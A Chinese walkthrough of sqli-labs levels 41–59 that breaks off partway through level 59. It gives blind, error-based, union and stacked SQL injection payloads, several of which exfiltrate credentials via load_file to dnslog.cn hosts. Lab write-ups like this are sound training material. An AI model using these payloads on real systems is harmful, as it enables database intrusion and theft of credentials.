SQL注入实操三(SQLilabs Less41-65)

文章目录

  • 一、sqli-labs靶场
    • 1.轮子模式总结
    • 2.Less-41 stacked Query Intiger type blind
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.堆叠注入
      • e.堆叠注入+外带注入获取表名
      • f.堆叠注入+外带注入获取列名
      • g.堆叠注入+外带注入获取表内数据
    • 3.Less-42 Stacked Query error based
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
      • g.联合注入获取数据库名
      • h.联合注入获取表名
      • i.联合注入获取列名
      • j.联合注入获取表内数据
      • k.堆叠注入获取数据库名称
    • 4.Less-43
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
      • g.联合注入+堆叠注入+外带注入获取数据库名称
      • h.联合注入+堆叠注入+外带注入获取表名称
      • i.联合注入+堆叠注入+外带注入获取列名称
      • j.联合注入+堆叠注入+外带注入获取表内数据
    • 5.Less-44
      • a.注入点判断
      • b.获取数据库名称
      • c.获取表名
      • d.获取列名
      • e.获取表内数据
    • 6.Less-45
      • a.获取数据库名称
      • b.获取表名
      • c.获取列名
      • d.获取表内数据
    • 7.Less-46
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 8.Less-47
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 9.Less-48
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 10.Less-49
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 11.Less-50
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 12.Less-51
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 13.Less-52
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 14.Less-53
      • a.获取数据库名称
      • b.获取表名
      • c.获取列名
      • d.获取表内数据
    • 15.Less-54
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 16.Less-55
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 17.Less-56
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 18.Less-57
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 19.Less-58
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 20.Less-59
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 21.Less-60
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 22.Less-61
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
      • 23.Less-62
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 24.Less-63
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 25.Less-64
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
    • 26.Less-65
      • a.注入点判断
      • b.轮子测试
      • c.获取数据库名称
      • d.获取表名
      • e.获取列名
      • f.获取表内数据
  • 三、笔记
  • 四、信息收集常用端口
  • 五、常用测试xss
  • 六、SQL注入万能密码
  • 七、本次攻防演练中得到的几点经验

一、sqli-labs靶场

1.轮子模式总结

到目前为止,我总结了一下出现过的轮子,可以得出一个结论,首先需要知道有几个参数,前面6种都是单参数的,多参数的只能通过报错信息得知,用–+还是#也要看报错情况
① n’ union select 1,2, ’
n可以是1,-1,n’后面可接),select后面看情况设置显示位
② ')–+
)可选,'可换成"
③ ‘) --+(
)可换成)),(可换成((,‘可换成"
④ " --+或’ #或’ --+
⑤ ’ and if(1=1, sleep(1), 1)#
⑥ ") and sleep(1) #
⑦ ', 1, 1)#
⑧ ‘) and 1 and (’
⑨ ‘||1||’
⑩ ‘#或‘–+
⑪ 1’) anandd (if(1=1, sleep(1), 1)) anandd('1

2.Less-41 stacked Query Intiger type blind

a.注入点判断

发现除了输入正确的id值有显示,其他输入都没有显示
怀疑存在时间盲注
输入3 and sleep(1)试下
在这里插入图片描述

延迟1秒
输入3 and if(1=1, sleep(1),0)试下
在这里插入图片描述

还是延迟1秒
输入3 and if(1=2, sleep(1),0)
在这里插入图片描述

没有延迟
证明存在时间盲注点

b.轮子测试

轮子就是3 and if(1,sleep(1), 0)

c.获取数据库名称

测试长度
3 and if(length(database())=8,sleep(1), 0)
在这里插入图片描述

说明长度是8
爆破字母
3 and if(substr(substr((database()), 1),1,1) = ‘s’, sleep(1), 1)
在这里插入图片描述

接下来我们直接使用堆叠注入,后面的内容略过

d.堆叠注入

3 and if(length(database())=8,sleep(1), 0);
首先查看状态
show variables like ‘%general%’;
在这里插入图片描述

使用堆叠注入修改设置
3 and if(length(database())=8,sleep(1), 0);set global general_log = on;
在这里插入图片描述在这里插入图片描述

修改成功
接下来我打算使用堆叠注入+外地注入获得更多信息

e.堆叠注入+外带注入获取表名

3 and if(length(database())=8,sleep(1), 0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit2,1),‘.6bub0w.dnslog.cn\abc’));#
在这里插入图片描述在这里插入图片描述

说明可以通过堆叠注入获取列名
只是外带注入一次只能获取一个值,也不能使用group_concat

f.堆叠注入+外带注入获取列名

3 and if(length(database())=8,sleep(1), 0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.6bub0w.dnslog.cn\abc’));#
在这里插入图片描述在这里插入图片描述

g.堆叠注入+外带注入获取表内数据

3 and if(length(database())=8,sleep(1), 0);select load_file(concat(‘\\’,(select username from users where id = 8),‘.6bub0w.dnslog.cn\abc’));select load_file(concat(‘\\’,(select password from users where id = 8),‘.6bub0w.dnslog.cn\abc’));#
虽然说堆叠语句只能一个个获取数据,但是我发现它可以这样用,再加一条语句,再加一条,那样也相当于可以获取多个数据了
在这里插入图片描述在这里插入图片描述

发现没有都出来了,而且这个方法也省去了测试长度爆破的麻烦,一次性获取数据

3.Less-42 Stacked Query error based

在这里插入图片描述

又是二次注入?不是
在这里插入图片描述

因为创建用户名的入口被限制了,那只能老老实实找注入点了

a.注入点判断

发现注入点在主界面密码框
在这里插入图片描述

触发条件是单数单引号

b.轮子测试

通过报错我们开始构造轮子
报错说明id是 “id’ ‘,即有两层单引号
输入2’ and 1’ --+:near ‘’’ at line 1
输入2’and1–+:near ‘and1–+’’ at line 1
输入2’) and 1:near ‘) and 1’’ at line 1
两个引号怎么闭合不了呢

c.获取数据库名称

2’ and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ’
在这里插入图片描述

终于出现了,那么轮子就是
2’ and 1 and ’
由此也可以得到一个经验,看引号判断需要几个and

d.获取表名

2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and ’
在这里插入图片描述

e.获取列名

2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and ’
在这里插入图片描述

f.获取表内数据

2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and ’
在这里插入图片描述

另外发现这里居然还可以用联合注入

g.联合注入获取数据库名

2’ union select 1,2,3 and’
没有报错,居然进去了
在这里插入图片描述

改成 2’ union select 1,database(),2 and’
在这里插入图片描述

直接拿到数据库名了

h.联合注入获取表名

2’ union select 1,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),2 and’
在这里插入图片描述

i.联合注入获取列名

2’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),2 and’
在这里插入图片描述

j.联合注入获取表内数据

2’ union select 1,(select group_concat(username,‘:’, password) from users),2 and’
在这里插入图片描述

2’ union select 1,(select group_concat(username,‘:’, password) from users where id=4),2 and’
在这里插入图片描述

k.堆叠注入获取数据库名称

1’;select load_file(concat(‘\\’,(select database()),‘.kdah15.dnslog.cn\abc’)) and ';#

在这里插入图片描述

4.Less-43

a.注入点判断

还是密码框存在报错注入,输入1’报
near ‘‘1’’)’ at line 1
猜测应该是’(‘‘id’’)‘,所以轮子应该类似
2’) and 1 and (’

b.轮子测试

输入2’) and 1 and ('没有报错,估计轮子可用
在这里插入图片描述

c.获取数据库名称

2’) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and (’
在这里插入图片描述

d.获取表名

2’) and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and (’
在这里插入图片描述

e.获取列名

2’) and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and (’
在这里插入图片描述

f.获取表内数据

2’) and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and (’
在这里插入图片描述

g.联合注入+堆叠注入+外带注入获取数据库名称

奇怪了,这里使用堆叠注入为啥拿不到数据呢
2’) and updatexml(1,concat(0x7e,(SELECT database())),0x7e);select load_file(concat(‘\\’,(select database()),‘.igqu2e.dnslog.cn\abc’));
失败
2’) and updatexml(1,concat(0x7e,(SELECT database())),0x7e);set global general_log = on;#
失败
1’);select load_file(concat(‘\\’,(select database()),‘.kdah15.dnslog.cn\abc’)) and (';#
在这里插入图片描述

分析后发现原因可能是前面的报错注入影响了后面的堆叠注入了,因为把前面的报错注入去除就正常了,这也给了我一个教训,不能贪多
但是用联合注入加堆叠注入又可以,说明就是报错注入引起的
2’) union select 1,database(),2;select load_file(concat(‘\\’,(select database()),‘.igqu2e.dnslog.cn\abc’)) ;#
在这里插入图片描述在这里插入图片描述

h.联合注入+堆叠注入+外带注入获取表名称

2’) union select 1,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),2;select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.igqu2e.dnslog.cn\abc’)) ;#

在这里插入图片描述在这里插入图片描述

记住外带注入里不要用group_concat,要用limit去指定取哪行

i.联合注入+堆叠注入+外带注入获取列名称

2’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database()),2;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.igqu2e.dnslog.cn\abc’)) ;#

在这里插入图片描述在这里插入图片描述

j.联合注入+堆叠注入+外带注入获取表内数据

2’) union select 1,(select group_concat(username,‘:’, password) from users where id=4),2; select load_file(concat(‘\\’,(select username from users where id=4 ),‘.igqu2e.dnslog.cn\abc’)) ;#
2’) union select 1,(select group_concat(username,‘:’, password) from users where id=4),2; select load_file(concat(‘\\’,(select password from users where id=4 ),‘.igqu2e.dnslog.cn\abc’)) ;#

在这里插入图片描述在这里插入图片描述

5.Less-44

这一关没有报错提示了,看来只能用盲注

a.注入点判断

仍然是密码框存在注入

b.获取数据库名称

2’;select load_file(concat(‘\\’,(select database()),‘.ny8562.dnslog.cn\abc’));
在这里插入图片描述

看来这个外带注入还是比较好用,特别是对盲注时,不用再爆破了

c.获取表名

2’;select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.ny8562.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 2,1),‘.ny8562.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.ny8562.dnslog.cn\abc’));
一次性拿多条数据了
在这里插入图片描述

d.获取列名

2’;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),‘.ny8562.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 1,1),‘.ny8562.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.ny8562.dnslog.cn\abc’)) ;
在这里插入图片描述

e.获取表内数据

2’;select load_file(concat(‘\\’,(select username from users where id=4 ),‘.ny8562.dnslog.cn\abc’)) ;#
2’;select load_file(concat(‘\\’,(select password from users where id=4 ),‘.ny8562.dnslog.cn\abc’)) ;#
在这里插入图片描述

6.Less-45

仍然是密码框注入,需要增加括号闭合

a.获取数据库名称

2’);select load_file(concat(‘\\’,(select database()),‘.xchvq5.dnslog.cn\abc’));
在这里插入图片描述

b.获取表名

2’);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.xchvq5.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 2,1),‘.xchvq5.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.xchvq5.dnslog.cn\abc’));
在这里插入图片描述

c.获取列名

2’);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 1,1),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.xchvq5.dnslog.cn\abc’)) ;
在这里插入图片描述

d.获取表内数据

2’);select load_file(concat(‘\\’,(select username from users where id=4 ),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select password from users where id=4 ),‘.xchvq5.dnslog.cn\abc’)) ;#
在这里插入图片描述

7.Less-46

Please input parameter as SORT with numeric value

a.注入点判断

这关啥意思呢,输啥都看不到结果?
后来才知道需要将参数名设为sort,然后分别输入1,2,3结果都不同,输入4以外报错
在这里插入图片描述

输入单引号报错,但是再输入1个单引号报错不会消失
在这里插入图片描述

b.轮子测试

1 and 1#
输出正常

c.获取数据库名称

1 and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) #
在这里插入图片描述

d.获取表名

1 and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e)#
在这里插入图片描述

e.获取列名

1 and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) #
在这里插入图片描述

f.获取表内数据

1 and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e)#
在这里插入图片描述

8.Less-47

a.注入点判断

这一关现在只要不输单引号发现都是这个界面,没有变化了,咋回事
在这里插入图片描述

b.轮子测试

看提示,error base single quote,指的是单引号报错,应该需要闭合
2’ and 1 and '没有错误

c.获取数据库名称

2’ and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ’
在这里插入图片描述

d.获取表名

2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and ’
在这里插入图片描述

e.获取列名

2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and ’
在这里插入图片描述

f.获取表内数据

2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and ’
在这里插入图片描述

9.Less-48

a.注入点判断

这一关是盲注,只有正常与否两种状态
但是好奇怪,盲注的延迟时间怎么这么久呢
3 and if(1=1,sleep(1),0)#
在这里插入图片描述

b.轮子测试

3 and if(1=2,sleep(1), 1) and (1)#
在这里插入图片描述

有延迟,显示正确

c.获取数据库名称

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’)))#
在这里插入图片描述

外带获取数据库名称,记住不要把外带注入放在if里面

d.获取表名

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.9o20ch.dnslog.cn\abc’)))#
在这里插入图片描述

e.获取列名

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.9o20ch.dnslog.cn\abc’)))#
在这里插入图片描述

f.获取表内数据

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select password from users where id=4 ),‘.9o20ch.dnslog.cn\abc’)))#
在这里插入图片描述

10.Less-49

a.注入点判断

单引号出现盲注

b.轮子测试

3’ and if(1=2,sleep(1), 1) and (1) and '#
显示正常

c.获取数据库名称

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’))) and '#
在这里插入图片描述

d.获取表名

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.9o20ch.dnslog.cn\abc’))) and '#
在这里插入图片描述

e.获取列名

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.9o20ch.dnslog.cn\abc’))) and '#
在这里插入图片描述

f.获取表内数据

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select password from users where id=4 ),‘.9o20ch.dnslog.cn\abc’))) and '#
在这里插入图片描述

11.Less-50

a.注入点判断

加入引号发现有报错提示,直接使用报错注入

b.轮子测试

3 and if(1=1,1,0)
显示正常

c.获取数据库名称

3 and if(1=1,updatexml(1,concat(0x7e,(SELECT+database())),0x7e),0)
在这里插入图片描述

d.获取表名

3 and if(1=1,updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) ,0)
在这里插入图片描述

e.获取列名

3 and if(1=1,updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e),0)
在这里插入图片描述

f.获取表内数据

3 and if(1=1,updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e),0)
在这里插入图片描述

另外发现这里还可以用堆叠注入
3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.d4u0mk.dnslog.cn\abc’))
在这里插入图片描述

12.Less-51

a.注入点判断

单引号报错注入

b.轮子测试

2’ and 1 and ’

c.获取数据库名称

2’ and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ’
在这里插入图片描述

d.获取表名

2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and ’
在这里插入图片描述

e.获取列名

2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and ’
在这里插入图片描述

f.获取表内数据

2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and ’
在这里插入图片描述

13.Less-52

a.注入点判断

这一关只有输入1,2,3才有显示,其他一概不显示,
输入3 and if(1=1,sleep(1),0),有延迟,时间盲注

b.轮子测试

使用堆叠注入
3 and if(1=1,sleep(1),0);1;

c.获取数据库名称

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

d.获取表名

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

e.获取列名

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

f.获取表内数据

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select password from users where id=4 ),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

14.Less-53

这一关和上一关的区别是需要加单引号注入

a.获取数据库名称

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

b.获取表名

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database()%20 limit 3,1),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

c.获取列名

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

d.获取表内数据

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select password from users where id=4 ),‘.j6fykz.dnslog.cn\abc’));
在这里插入图片描述

15.Less-54

a.注入点判断

54关又不一样了
在这里插入图片描述

意思是它会给你10次试错机会,10次还是失败的话重置所有随机数据
首先url输入id
在这里插入图片描述

然后输入key,每次报错都会累加已尝试的次数
但是怎么看不到报错呢,是在url里注入吗,id里发现加单引号不显示,再加又有显示,说明存在盲注

b.轮子测试

那么轮子怎么构造呢,对,那就不用管下面那个输入框了,直接url注入就行了
1’ and if(1=1,sleep(1),0) and (1)–+
在这里插入图片描述

延迟1秒,说明正确

c.获取数据库名称

1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.lx01qu.dnslog.cn\abc’)))–+
在这里插入图片描述

数据库名称是challanges

d.获取表名

1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.lx01qu.dnslog.cn\abc’)))–+
在这里插入图片描述

看来只有一个表

e.获取列名

1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.63lr5q.dnslog.cn\abc’)))–+
在这里插入图片描述

实际表格如下
在这里插入图片描述

f.获取表内数据

首先需要先获取表名和列名,然后带入才能获取数据
vamnq7byet
secret_VEKS
1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_VEKS from vamnq7byet where id=1 ),‘.63lr5q.dnslog.cn\abc’)))–+
在这里插入图片描述

下面的输入框输入Sn04znQcZJNl6L0tADgOhcRS提示正确
在这里插入图片描述

英文表示:祝贺你成功了

16.Less-55

a.注入点判断

在这里插入图片描述

这次可以试错14次,是难度减低了还是提高了
不管他,先看下怎么注入,发现除了数字其他都不显示,看来要盲注了

b.轮子测试

4 and if(1=1,sleep(1),0) and (1)#
在这里插入图片描述

出现延时,那轮子应该就是它了

c.获取数据库名称

4 and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.leccsl.dnslog.cn\abc’)))#
单独运行select有数据,但是为啥界面没结果呢
在这里插入图片描述

大概是语句哪里还是不对吧,重新构造轮子

  1. and if(1=1,1,0) and (1)–+
    在这里插入图片描述

嗯这里有显示才能用,之前的轮子没显示,难怪怎么都没反应,所以记住了,以后构造的轮子一定要显示结果才行
1)and if(1=1,1,0) and (select load_file(concat(‘\\’,(select database()),‘.f1xl21.dnslog.cn\abc’)))–+
在这里插入图片描述

d.获取表名

1)and if(1=1,1,0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.f1xl21.dnslog.cn\abc’)))–+
在这里插入图片描述

uhf25xqo3t

e.获取列名

1)and if(1=1,1,0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.f1xl21.dnslog.cn\abc’)))–+
在这里插入图片描述

secret_WUAZ

f.获取表内数据

  1. and if(1=1,1,0) and (select load_file(concat(‘\\’,(select secret_WUAZ from uhf25xqo3t where id=1),‘.f1xl21.dnslog.cn\abc’)))–+
    在这里插入图片描述

记住,sql语句里不要插入回车符
d7oT09Des0BDFr51bmmpn0Gv
输入这串数字成功过关
在这里插入图片描述

17.Less-56

a.注入点判断

还是这种题,看来后面都是这种类型的,单引号盲注报错注入

b.轮子测试

4’) and (1) --+
正常输出,记住了,像这样才是对的
在这里插入图片描述

c.获取数据库名称

4’) and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --+
在这里插入图片描述

d.获取表名

4’) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.6oq86c.dnslog.cn\abc’))) --+
在这里插入图片描述

9q15lsxx4o

e.获取列名

4’) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.6oq86c.dnslog.cn\abc’))) --+
在这里插入图片描述

secret_F62S

f.获取表内数据

4’) and (select load_file(concat(‘\\’,(select secret_F62S from 9q15lsxx4o where id=1),‘.6oq86c.dnslog.cn\abc’))) --+
在这里插入图片描述在这里插入图片描述

MRS84WI5bRz1wUEPRjwkOTNN

18.Less-57

a.注入点判断

双引号注入,没什么好说的

b.轮子测试

4" and (1)–+

c.获取数据库名称

4" and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --+
在这里插入图片描述

d.获取表名

4" and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.6oq86c.dnslog.cn\abc’)))–+
在这里插入图片描述

kxkae71r4p

e.获取列名

4" and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.6oq86c.dnslog.cn\abc’)))–+
在这里插入图片描述

secret_R3DQ

f.获取表内数据

4" and (select load_file(concat(‘\\’,(select secret_R3DQ from kxkae71r4p where id=1),‘.6oq86c.dnslog.cn\abc’)))–+
在这里插入图片描述

qCPyRxfEqRmVzBQYyVQ5Y3h9

19.Less-58

a.注入点判断

在这里插入图片描述

终于出现报错注入了

b.轮子测试

2’ and (1) --+

c.获取数据库名称

2’ and (updatexml(1,concat(0x7e,(SELECT+database())),0x7e)) --+
在这里插入图片描述

d.获取表名

2’ and (updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e)) --+
在这里插入图片描述

k9e8a7yl0f

e.获取列名

2’ and (updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e)) --+
在这里插入图片描述

secret_58RO

f.获取表内数据

2’ and (updatexml(1, concat(0x7e,(select secret_58RO from k9e8a7yl0f where id = 1),0x7e), 0x7e)) --+
在这里插入图片描述

Vd6Sg7IYEnmoKrdsx3u74wAa
在这里插入图片描述

20.Less-59

a.注入点判断

报错注入,不用加引号啥的

b.轮子测试

2 and 1 --+

c.获取数据库名称

2 and updatexml(1,concat(0x7e,(SELECT+database())),0x7e)–+
在这里插入图片描述

d.获取表名

2 and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) --+
在这里插入图片描述

qi7pnhikpv

e.获取列名

